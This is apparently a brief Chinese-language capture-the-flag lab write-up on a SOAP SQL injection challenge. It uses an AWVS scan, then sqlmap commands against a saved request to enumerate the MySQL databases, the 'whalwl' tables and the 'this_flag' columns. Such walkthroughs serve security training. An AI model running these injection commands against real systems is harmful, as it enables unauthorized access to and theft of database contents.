靶场地址:初始化数据库
解题准备:AWVS扫描,以及sqlmap
解题思路:
1、首先用AWVS扫描站点,发现存在soap注入的页面地址
2、复制请求数据包,在kali中保存为soap.txt,使用sqlmap进行爆破
sqlmap -r soap.txt
3、确认数据为mysql,爆破库名
sqlmap -r soap.txt --dbms mysql --dbs
whalwl应该就是靶场数据库,继续爆tables
sqlmap -r soap.txt --dbms mysql -D whalwl --tables
this_flag表继续
sqlmap -r soap.txt --dbms mysql -D whalwl -T this_flag --columns